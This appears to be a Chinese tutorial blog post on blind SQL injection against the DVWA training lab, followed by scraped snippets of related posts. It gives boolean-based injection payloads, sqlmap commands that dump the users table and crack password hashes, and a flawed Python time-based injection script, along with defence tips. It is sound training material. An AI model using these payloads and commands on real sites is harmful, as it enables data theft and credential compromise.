dvwa-sql盲注

最新推荐文章于 2025-02-20 17:42:55 发布
原创 最新推荐文章于 2025-02-20 17:42:55 发布 · 4.8k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞 #网络安全 #测试工具

本文详细介绍了SQL盲注的原理和不同类型,包括基于布尔和时间的盲注。通过实例展示了如何利用sqlmap工具进行SQL注入攻击,以及如何手动逐字符猜解数据库、表和字段信息。同时,文章还探讨了防御SQL盲注的方法,如参数化查询、特殊字符转义等。

sql盲注

low级别

先提交个参数,发现执行成功就是回显时只是说这个id存在数据库,没有回显出id具体信息,怪不得叫盲注。

在这里插入图片描述

分析源码没有对所提交参数id做任何处理就直接执行了,只是回显的时候被隐藏了。

在这里插入图片描述

其实也可以通过ascaii码来一个一个字符弄出来,输入1’ and length(database())=1#,显示User ID is MISSING from the database.
输入1’ and length(database())=2#,显示User ID is MISSING from the database.
输入1’ and length(database())=3#,显示User ID is MISSING from the database.
输入1’ and length(database())=4#,显示User ID exists in the database.
说明数据库名长度为4.
数据库名:
输入1’ and ascii(substr(database(),1,1))>97#,显示User ID exists in the database.,说明第一个字符的ascii值大于97(a)
输入1’ and ascii(substr(database(),1,1))<122#,显示User ID exists in the database.,说明第一个字符的ascii值小于122(z)
输入1’ and ascii(substr(database(),1,1))<110#,显示User ID exists in the database.,说明第一个字符的ascii值小于110(n)
输入1’ and ascii(substr(database(),1,1))<104#,显示User ID exists in the database.,说明第一个字符的ascii值小于104(h)
输入1’ and ascii(substr(database(),1,1))<100#,显示User ID is MISSING from the database.
,说明第一个字符的ascii值不小于100(d)
输入1’ and ascii(substr(database(),1,1))>100#,显示User ID is MISSING from the database.
,说明第一个字符的ascii值不大于100(d)
输入1’ and ascii(substr(database(),1,1))=100#,显示User ID exists in the database.
,说明第一个字符的ascii值等于100(d)
根据上述二分法最终得到数据库名为dvwa。

但是这样太麻烦,直接sqlmap 莽就完事了,懂得利用工具才是人,冲就完事了

在这里插入图片描述

发现有两个类型的注入漏洞,一个是基于布尔的,一个是基于时间的

在这里插入图片描述

然后用–dbs ,遍历出全部数据库pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” --dbs

在这里插入图片描述

查看当前数据库pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” --current-db

在这里插入图片描述

知道数据库直接继续冲有什么表pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” -D dvwa --tables
在这里插入图片描述

然后看看表里属性的信息pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” -D dvwa -T users --columns

在这里插入图片描述

接着直接看见user和password就直接莽内容

pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=56ohejeqpp84475jdbun08fsv4” -D dvwa -T users --dump

因为密码有哈希值他问我要不要直接用他的字典爆破,其实用不用无所谓自己查也可以,懒点就点yes,摆烂直接自动破解,结果如图,只爆破出两个,不过也够了。
在这里插入图片描述

medium级别

查看源码是数字型注入,还有一个过滤特殊符号的函数,其实也可以拿工具冲。

在这里插入图片描述

首先抓个包复制http请求包到文件sql.txt里,然后直接用sqlmap冲,

在这里插入图片描述

直接把漏洞爆破出来了
在这里插入图片描述

摸下数据库pyload:sqlmap -r sql.txt --current-db 后面都是输命令就行,不多演示。

在这里插入图片描述

high级别

分析源码发现限制了输出行数为一行,而且失败时 当他随机生成的数等于3就会随机休眠2-4秒,目的是干扰基于时间的盲注

在这里插入图片描述

继续用sqlmap莽,先把包搞里头

在这里插入图片描述

然后发现莽不动了,那只能用手工了,因为时间盲注被限制了,只能用布尔盲注,ascll码慢慢冲

在这里插入图片描述

用手工的方式,基本思路:count确定数量,length()函数确定长度,然后用ascii码substr截取比较排除,这里一般用二分法。

前面low级别已经手工冲出数据库为dvwa,接下来冲表

先确定好数据库里有几个表

pyload:1’ and (select count(table_name) from information_schema.tables where table_schema=database())=1 #显示 MISSING

pyload:1’ and (select count(table_name) from information_schema.tables where table_schema=database())=2#显示 exists

可知道表的个数为2

接下来猜表名信息

1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) =1#显示 MISSING

1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) =9#显示 exists

可知表名长度为9

猜表的字符

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >100#显示 exists

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >103# 显示MISSING

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) =103#显示 exists

可知为第一个字符为g

在这里插入图片描述

依照猜解第一个表的第一个字符,我们就可以同理猜解出第二个,第三个,一直到第九个,最后,这第一个表名为guestsbook

同理再来猜解第二个表的长度和表名:最后得出第二个表的长度为5,表明为users

接着是猜字段,一样的原理,先搞数量然后,长度,然后字符

数量pyload:1’ and (select count(column_name) from information_schema.columns where table_name=‘users’)=11

得数量为11

长度pyload:1’ and length((select column_name from information_schema.columns where table_name=‘users’ limit 0,1))=7 #

得第一个字符串长度为7

字符pyload:1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=117 #

得第一个字符串的第一个字符为u,紧接着,同理我们可以猜出第二个,第三个,一直到第七个字符
最后猜解出users表的第一个字段的字段名是user_id

同理我们也可以猜出第二个,第三个,第四个直到第十一个字段名是first_name,ast_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

接着是表内容

数量pyload:1’ and ((select count(user) from users ))=5

得数量为5

长度pyload:1’ and length((select user from users limit 0,1))=5 #

得第一个字符串长度为5

字符pyload:1’ and ascii(substr((select user from users limit 0,1),1,1))=97 #

得第一个字符串的第一个字符为a

依次得第一个字符串为admin

总结

漏洞原理:关于sql一般有基于时间的盲注和基于布尔的盲注,归根结底还是参数处理没做好转义

方法:基于时间的盲注和基于布尔的盲注

防御:

1.通过waf sql限制策略

2.预处理+参数化

3.对特殊字符做转义,限制

4.对于基于时间的可以用sleep函数干扰

的第一个字符为a

依次得第一个字符串为admin

DVWA-sql
Darklord.W
04-09 974
sql低中高步骤截图及说明 低等级: 判断是否存在入,入是字符型还是数字型 猜解数据库 库名长度为4 猜数据库名dvwa substr() 函数返回字符串的一部分 substr(string,start,length) 猜数据库中表名 可得表个数为2 猜表的长度 第一个为9,第二个为5 猜表名 1' and ascii(substr(...
dvwaSQL
ANDTM的博客
05-30 1378
SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQLSQL入的区别就是它不会有完整的回显,这里分为两种,一种是布尔,另一种是时间
DVWASQL入(
天空之蓝的博客
11-17 4807
SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL入漏洞大多是SQL。手工的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA——SQL(全等级)
@一只躺平的猪@的博客
07-13 6772
SQL与一般入的区别在于:一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错入,本章主要介绍布尔。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA------SQL Injection (Blind)(SQL
m0_65712192的博客
12-09 4233
DVWA------SQL Injection (Blind)(SQL
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
DVWA靶场-sql
zeroone的博客
03-11 1626
第八关:SQL Injection(Blind)       SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL入漏洞大多是SQL。 Low <?php if( isset( $_GET[ 'Submit' ] )
DVWA-master.zip
01-04
这涵盖了、时间基入和错误回显等多种方法,有助于理解SQL入的危害和防御手段。 3. **跨站脚本(XSS)** XSS攻击允许攻击者在受害者的浏览器上执行恶意脚本。DVWA中的XSS练习涵盖了反射型和存储型两种类型...
DVWA-SQL Injection(Blind
Cwillchris的博客
10-28 1168
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: SQLInjection(Blind),即SQL,与一般入的区别在于,一般的入 攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL入漏洞大多是SQL分为基于布尔的、基于时间的以及基于报错.
DVWAsql入——
Williamanddog的博客
12-22 3708
DVWA
SQLDVWA
qq_45070118的博客
08-06 5631
SQL,目标只会回复是或不是,没有详细内容 一.基于布尔值的 初级low 如图说明成功 1 and 1=2,返回成功,说明没有执行后面语句,不是数字型 1’or’1’='1 说明成功 1’ and ‘1’ =‘1 成功 1’ and ‘1’ ='2 失败 说该SQL入为字符型 2.猜解数据库长度 1’ and length(database())=1 # 1’ and le...
DVWA-SQL
HoYim
03-05 687
基于布尔的 判断是否存在入,入是字符型还是数字型 输入1’and ‘1’=‘1,判断条件正确 输入1’ and ‘1’=‘2,判断条件错误 由此判断存在字符型入 2.猜解当前数据库名 猜数据库名的长度 输入1’ and length(database())=4# 确定长度为4 然后猜数据库名字,可用二分法节省时间 输入1’ and ascii(substr(databse(),0...
DVWAsql
qq_39670065的博客
08-08 3073
写在前面: 当时刷sqli-labs也浑浑噩噩没有做啥总结,现在就先从sql总结开始吧 SQL Injection(Blind) SQL与一般入的区别在于:一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知 sql又分为布尔,时间和基于报错的 理论上,能够布尔就一定能时间,能够时间不一定能布尔。相比之下,布尔稳定性更好,时间适用范围更广,但因为时间的实现原理是基
DVWASQL
随 风
10-27 647
一、SQL过程 (1)判断是否存在入,入是字符型还是数字型; (2)猜解当前数据库名---->猜解数据库名长度---->猜解数据库名称; (3)猜解数据库中的表名---->猜解表数量---->猜解表长度---->猜解表名称; (4)猜解表中字段名---->猜解当前表中有多少个字段---->猜解字段长度---->猜解字段名称 (5)猜解数据 二、SQL Injection(Blind) 1、Low级别 布尔 (1)判断是否存在入,入是字符型还是
DVWA——sql
weixin_44743506的博客
08-23 2685
一、sql入区别: 只回复是或否,Sql入回复详细信息; 过程: 1、判断是否存在入,入时字符型还是数字型 2、猜解数据库的长度,猜解数据库的名称 3、猜解数据库中有几个表,猜解表的长度,猜解表的名称 4、猜解表中有几个字段、猜解字段长度,猜解字段名称 5、猜解数据 类型: 基于布尔型的 基于时间的 基于报错的 二、思路 手工,因为服...
DVWA靶场第九关:SQL⼊()(SQL Injection (Blind))
weixin_55270891的博客
02-20 1200
抓包将参数id改为1’ and length(database())=4 #,显示存在,说明数据库名的⻓度为4个字。然后猜解数据库名:输⼊1’ and length(database())=4 #,显示存在:说明⻓度为4。SQL与⼀般⼊的区别在于⼀般的⼊攻击者可以直接从⻚⾯上看到⼊语句的执⾏结果,⽽。可以看到,High级别的代码利⽤cookie传递参数id,当SQL查询结果为空时,会执⾏函数。输⼊1 and 1 =1 和1 and 1 = 2均显示存在。可以通过过抓包来实现sql
DVWASQL
chtdgf的博客
02-14 1311
DVWASQL 一 LOW级别 我们可以通过 View Source获得代码如下 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql
DVWA-SQL medium
IWANnaaa的博客
04-03 543
DVWA-MASTER SQLmedium
dvwa靶场sqlhighwin
最新发布
03-08
### DVWA SQL Blind Injection High Level Attack Method In the context of DVWA (Damn Vulnerable Web Application), tackling a high-level SQL blind injection requires an understanding that this difficulty level incorporates several defensive measures to prevent straightforward exploitation. The application employs `mysql_real_escape_string` function which escapes special characters in a string for use in an SQL statement, effectively neutralizing many traditional SQL injection vectors[^2]. Additionally, parameters such as passwords are subjected to MD5 hashing before being processed by the database. For executing successful attacks on higher levels within DVWA's SQL blind injection challenge: - **Time-Based Blind SQL Injection**: Since direct data retrieval is not possible due to lack of output from queries, time-based techniques can be employed where one crafts payloads causing delays when certain conditions evaluate to true. This allows inferring information about the underlying database structure and content based on response times. An example payload might look like: ```sql ' AND IF(SUBSTRING(@@version,1,1)='5', SLEEP(5), false)-- ``` - **Boolean-Based Blind SQL Injection**: Another approach involves sending requests with crafted inputs designed so they result either in visible page differences between true/false outcomes without explicit error messages or changes in behavior observable through automated means. Given these constraints, it becomes necessary to systematically deduce each character position until enough information has been gathered regarding desired secrets stored inside databases connected to vulnerable web applications. #### Example Code Snippet Demonstrating Time-Delay Technique ```python import requests from string import ascii_lowercase, digits url = "http://example.com/dvwa/vulnerabilities/sqli_blind/" characters = ascii_lowercase + digits result = "" for i in range(1, 20): # Assuming maximum length of version string found_char = False for char in characters: payload = f"' OR ASCII(SUBSTRING((SELECT @@version LIMIT 1 OFFSET {i}),{i},1))={ord(char)}-- " start_time = time.time() res = requests.post(url, data={'id':payload,'Submit':'Submit'}) elapsed_time = time.time() - start_time if elapsed_time >= 5: # Adjust threshold according to server latency result += char print(f"[+] Found Character at Position {i}: {char}") break if not found_char: break print("[*] Retrieved Version String:", result) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值